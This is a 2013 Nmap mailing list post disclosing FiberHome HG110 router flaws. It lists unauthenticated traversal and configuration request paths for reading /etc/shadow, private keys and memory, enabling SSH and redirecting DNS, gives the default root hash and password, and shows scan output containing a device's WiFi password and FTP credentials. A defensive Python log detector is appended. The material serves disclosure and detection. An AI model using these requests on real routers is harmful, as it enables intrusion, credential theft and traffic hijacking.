Nmap Development mailing list archives
[NSE] Vulnerabilities in Fibrehome HG110
From: Tom Sellers <nmap () fadedcode net>
Date: Mon, 08 Jul 2013 06:44:24 -0500
On April 8th, 2011 Zerial ( fernando () zerial org ) published[1] details of local file inclusion and directory traversal vulnerabilities in the FiberHome HG110 wireless gateway. The documentation below expands upon his findings and provides a technical writeup of the impacts and vectors of these vulnerabilities. The attached script serves to provide concrete results from the vulnerabilities described.

Summary:

Authentication bypass and complete remote compromise via the HTTPS management interface in the default configuration of the FiberHome residential wireless gateway.

Certain Central and South American subsidiaries of Telefonica distributed a customized version of the FiberHome HG 110 wireless DSL gateway. The base device appears to be an often re-branded, Linux-based ZTE router. Analysis of both the Telefonica device, and those that it appears to have been derived from, indicates that authentication and session management controls were broken during the customization process. This appears to be intentional, as the new authenticationless interface directly references files that would normally be protected.

The result is that the HG 110 router suffers from a vulnerability that permits unauthenticated REMOTE access to configuration and status pages on the management interface. In addition to exposing information about the device and clients, this access permits the router to be configured without additional controls. The result is that the device can be remotely and completely compromised, permitting information disclosure, attack against client devices, and denial of service. It was not tested, but current information indicates that the ability to install malware and packet sniffing tools on the device is likely.

Further, the initial reconnaissance and reconfiguration traffic would occur over SSL, which would prevent monitoring the nature of the activities. The only indicator of concern would be anomalous traffic from public IP addresses. If this traffic is kept to a minimum it would likely blend into the background noise of the Internet.

Known affected versions are HG110_BH_V1.6 and HG110_BH_V1.9.

The access vectors are on TCP ports 443 (SSL) and 8000 (HTTP).

Examples of abuse of this vulnerability include:

- Enabling remote SSH, TELNET, FTP and other services. As the root password appears to be 'root' on this and similar models, this change alone completely compromises the device. The insecure direct object reference vulnerability can be combined with the local file inclusion vulnerability to access the password hashes in the /etc/shadow file. This permits validating that the password has not been changed from 'root' prior to enabling SSH. Cracking the hash is not required, as all unmodified devices will have the same hash: '$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.' Once the credentials are verified the attacker could enable SSH and remotely access the device as root. Enabling SSH can be accomplished with a single, unauthenticated HTTP POST request.
  Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=services

- Forwarding of external ports to internal clients, allowing direct attack of NAT/PAT'ed client devices.
  Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=portforwd

- Hijacking client traffic by changing the DNS configuration to point to malicious DNS servers.
  Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=dns

- Compromise of all configuration details, including SSID and password/key, of the wireless network.
  Path: /cgi-bin/webproc?getpage=html/gui/APIS/returnWifiJSON.txt&var:page=null
  Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=wireless&var:subpage=wlbasic
  Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=wireless&var:subpage=wlsecurity

- Disclosure of IP address, MAC address, connectivity type, status and sometimes hostnames of devices PAT/NAT'ed behind the router. Information about devices connected in the past, but without current leases, can also be captured.
  Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=status&var:page=dhcpclients
  Path: /cgi-bin/webproc?getpage=html/gui/APIS/returnDevicesJSON.txt&var:page=null
  Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=status&var:page=dhcpclients
  Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=status&var:page=wlclients
  Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=lan

- Compromise of Internet/PPP username
  Path: /cgi-bin/webproc?getpage=html/gui/APIS/returnInternetJSON.txt&var:page=null
  Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=wancfg

- Compromise of existing FTP server credentials and the ability to create new FTP accounts.
  Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=ftpd_count_manager

- Enable the ability to re-locate a target router by configuring it to register with a dynamic DNS provider
  Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=ddns

- Denial of service of remote hosts by way of SNMP amplification attack after enabling SNMP and permitting outside access.
  Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=nwtools&var:subpage=snmp
  Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=services

- Denial of service via reconfiguring many of the options and/or credentials

- Disclosure of device information, hardware, software and firmware versions, etc.
  Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=status&var:page=deviceinfo

- Access to usernames and password hashes:
  Path: /cgi-bin/webproc?getpage=../../../etc/passwd&var:menu=advanced&var:page=null
  Path: /cgi-bin/webproc?getpage=../../../etc/shadow&var:menu=advanced&var:page=null

- Access to the SSL certificate private key. This key is reused on many models of devices. The thumbprint is 562e 7f2f 7b3d 5913 a6ca 64f2 5854 d131 e56c 4ff7
  Issuer CN = localhost.localdomain, OU = ODC, O = Multitech, L = Bangalore, S = Karnataka, C = IN
  Path: /cgi-bin/webproc?getpage=../../../etc/mini_httpd.pem&var:menu=advanced&var:page=null

- Access to dump a portion of the device's memory. This sometimes contains configuration data, log contents, and user traffic.
  Path: /cgi-bin/webproc?getpage=../../../dev/mem&var:menu=advanced&var:page=null

- Access to configuration information stored by the device
  Path: /cgi-bin/webproc?getpage=../../../usr/www/html/config/config.xml&var:menu=advanced&var:page=null

- Access to device hardware and state information
  Path: /cgi-bin/webproc?getpage=../../../proc/version&var:menu=advanced&var:page=null   /proc/version
  Path: /cgi-bin/webproc?getpage=../../../proc/cpuinfo&var:menu=advanced&var:page=null   /proc/cpuinfo
  Path: /cgi-bin/webproc?getpage=../../../proc/net/arp&var:menu=advanced&var:page=null   /proc/net/arp

In addition to illustrating some of the issues listed above, the attached script also captures the web login password hashes that are present in the sign-on page's HTML. These hashes are compared to publicly known support passwords, which are indicated when found.
The following is output from the attached NSE script that illustrates the access and information gained using these vulnerabilities.

443/tcp open  https   syn-ack
| vuln-fiberhome-hg-router:
|   Device:
|     Manufacturer: FIBERHOME
|     Serial Number: a3c31648f14f
|     Hardware Ver: HG110_BH_R1A
|     Software Ver: HG110_BH_V1.9
|     Firmware Ver: 1.0.0
|     Kernel: Linux version 2.6.19
|     LAN Interface: 192.168.1.1( b8:c7:10:18:c3:1a )
|     Time: 2000-01-02T18:31:11
|   LAN:
|     Network: 192.168.1.1 / 255.255.255.0
|     DHCP:
|       Pool: 192.168.1.50 - 192.168.1.100
|       Active: True
|   WiFi:
|     SSID: Serg_WiFI2
|     Security: WPA
|     Password: log1n21
|     Channel: 0(AUTO)
|     Active: True
|   Internet:
|     Status: up
|     Speed: Down: 6,3Mb Up: 309Kb
|     Type: DSL
|     User: 0010001290112@domain
|     Password:
|   Branding:
|     Branding: o2
|     Link: http://movistar.es
|     Country: CH
|     Default Language: es
|   Web Credential Hashes:
|     User           Hash
|     Administrador  $1$TW$4/4tmV7BKHXCDn5keBLUT1
|     user           $1$TW$dMolyCCNuy2WxyLJ.zUWv0 ( password is Need4$MVS.cl )
|     support        $1$TW$yS.Dzi9LPS3wn0qUQMBEA1 ( password is support )
|
|   FTP Credentials:
|     User     Password
|     ftpuser  S3cr3t
|
|   /etc/passwd:
|     #root:x:0:0:root:/root:/bin/bash
|     root:x:0:0:root:/root:/bin/sh
|     #tw:x:504:504::/home/tw:/bin/bash
|     #tw:x:504:504::/home/tw:/bin/msh
|   /etc/shadow:
|     #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
|     root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7::: ( password is root )
|     #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
|     #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
|   DHCP Clients:
|     IP Address    MAC Address        Name
|     192.168.1.33  00:1b:b9:e1:21:af  sergio-PC
|     192.168.1.36  74:a7:22:2a:77:4f  android_ccaaa72b455fcc52
|
|   Device History:
|     IP Address        MAC Address        Connection Type  Status
|     192.168.1.16      D8:5D:4C:6F:89:E0  Ethernet         disconnected
|     192.168.1.33      00:1b:b9:e1:21:af  Ethernet         disconnected
|     192.168.1.34      f4:0b:93:f0:0f:a1  WiFi             disconnected
|     192.168.1.35      fc:0f:e6:09:14:22  Ethernet         connected
|     192.168.1.34      00:22:15:27:85:9d                   disconnected
|     169.254.235.110)00:1B:B9:A5:71:A  00:1B:B9:A5:71:A   disconnected
|     192.168.1.36      74:a7:22:2a:77:4f  WiFi             disconnected
|     186.172.129.206)74:A7:22:24:98:1  74:A7:22:24:98:1   disconnected
|     192.168.1.35      00:26:6c:ef:f3:95  Ethernet         disconnected
|     192.168.1.35      e0:ca:94:bd:06:c5  WiFi             disconnected
|     192.168.1.36      78:e4:00:b6:35:1a  WiFi             disconnected
|     192.168.1.37      bc:b1:f3:25:53:e3  WiFi             disconnected
|     169.254.202.102)78:E4:00:B6:35:2  78:E4:00:B6:35:2   disconnected
|     192.168.1.34      58:c3:8b:5c:1b:3a  WiFi             disconnected
|_    192.168.1.34      00:1A:73:93:82:4B  WiFi             disconnected

References:

1. Local file inclusion publicly released in April 2011 by Zerial ( fernando () zerial.org )
   http://osvdb.org/show/osvdb/71827
   http://seclists.org/fulldisclosure/2011/Apr/132
   http://seclists.org/fulldisclosure/2011/Apr/153
   http://blog.zerial.org/seguridad/vulnerabilidad-en-todos-los-routers-fiberhome-hg-110-de-telefonicamovistar/

If the attached script is suitable for inclusion I will rename and commit it.

Tom Sellers
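A defender-side check for the access vectors listed in the post, added here as an example; it is not part of Tom Sellers' message or of the attached NSE script. It runs over constructed request records ("source IP, method, request target", as a sensor in front of the gateway could record them for the plaintext port 8000) and flags traversal in the getpage parameter, protected menus or JSON status dumps requested from outside the LAN, and configuration POSTs arriving from outside. The LAN range is taken from the 192.168.1.1 / 255.255.255.0 line in the script output and the alert labels are this example's own.

```python
import ipaddress
from urllib.parse import parse_qs, unquote, urlsplit

# The gateway's LAN as reported in the script output (192.168.1.1 / 255.255.255.0); an assumption.
LAN = ipaddress.ip_network("192.168.1.0/24")

# Menus of the management interface that the post shows are reachable without a session.
PROTECTED_MENUS = {"maintenance", "advanced", "setup"}

# Constructed sample records (not captured from a real device): "<src_ip> <method> <request target>".
SAMPLE_LOG = """\
192.168.1.33 GET /cgi-bin/webproc?getpage=html/index.html&var:menu=status&var:page=deviceinfo
203.0.113.7 GET /cgi-bin/webproc?getpage=../../../etc/shadow&var:menu=advanced&var:page=null
203.0.113.7 POST /cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=services
198.51.100.9 GET /cgi-bin/webproc?getpage=html/gui/APIS/returnWifiJSON.txt&var:page=null
192.168.1.36 GET /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=dns
203.0.113.7 GET /cgi-bin/webproc?getpage=..%252F..%252F..%252Fdev%252Fmem&var:menu=advanced&var:page=null
"""

def classify(record):
    """Return the alert labels that apply to one record (empty list when nothing stands out)."""
    src, method, target = record.split(None, 2)
    url = urlsplit(target)
    if url.path != "/cgi-bin/webproc":
        return []
    params = parse_qs(url.query)
    # parse_qs decodes once; decode again so a double-encoded "..%252F" is still caught.
    getpage = unquote(params.get("getpage", [""])[0])
    menu = params.get("var:menu", [""])[0]
    external = ipaddress.ip_address(src) not in LAN
    alerts = []
    if "../" in getpage or getpage.startswith("/"):
        alerts.append("lfi-traversal")           # getpage escaping the html/ tree, any source
    if external and menu in PROTECTED_MENUS:
        alerts.append("external-mgmt-page")      # protected menu requested from outside the LAN
    if external and "/APIS/" in getpage:
        alerts.append("external-api-dump")       # returnWifiJSON/returnDevicesJSON-style dumps
    if external and method == "POST":
        alerts.append("external-config-change")  # unauthenticated reconfiguration from outside
    return alerts

def scan(log):
    """Map each flagged record to (source IP, alerts); records without alerts are dropped."""
    findings = []
    for record in log.strip().splitlines():
        alerts = classify(record)
        if alerts:
            findings.append((record.split()[0], alerts))
    return findings
```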
Attachment: vuln-fiberhome-hg-router.nse
_______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/